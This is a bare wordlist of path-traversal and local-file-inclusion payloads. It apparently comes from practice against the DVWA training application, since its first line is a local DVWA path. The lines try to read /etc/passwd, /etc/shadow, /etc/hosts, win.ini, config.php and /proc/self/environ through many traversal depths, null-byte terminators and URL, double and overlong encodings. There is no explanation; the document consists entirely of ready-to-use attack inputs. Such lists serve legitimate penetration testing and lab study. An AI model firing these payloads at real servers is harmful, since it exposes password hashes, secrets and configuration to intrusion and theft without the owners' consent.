E:\phpstudy\PHPTutorial\WWW\DVWA\robots.txt
/etc/passwd
///etc/passwd
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../windows/win.ini
/etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
\etcpasswd
....................etcpasswd
etcpasswd%00
....................etcpasswd%00
//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
//etc/passwd%00
....//....//....//....//....//....//....//....//....//....//etc/passwd%00
///etc/hosts
../../../../../../../../../../../../etc/hosts
/etc/hosts%00
../../../../../../../../../../../../etc/hosts%00
///etc/shadow
../../../../../../../../../../../../etc/shadow
/etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
....//....//....//....//....//....//....//....//....//....//etc/hosts
....//....//....//....//....//....//....//....//....//....//etc/hosts%00
etcgroup%00
....................etcgroup%00
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd%00
/../../../../../../../../../../etc/passwd^^%00
/../../../../../../../../../../etc/shadow^^%00
../../../../../../../etc/passwd%00
/./././././././././././etc/passwd%00
/./././././././././././etc/shadow%00
/./././././././././././etc/group%00
........etcpasswd%00
/%00//%00//%00//%00//%00/etc/passwd%00
/%00//%00//%00//%00//%00//etc//shadow%00
/%2e%2e../%2e%2e../%2e%2e../%2e%2e../%2e%2e../%2e%2e../etc/passwd%00
..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00
..//..//..//..//..//config.php%00
../../../../config.php%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00
..%25%35%63..%25%35%63..%25%35%63config.php%00
///proc/self/environ
../../../proc/self/environ
/proc/self/environ%00
../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ%00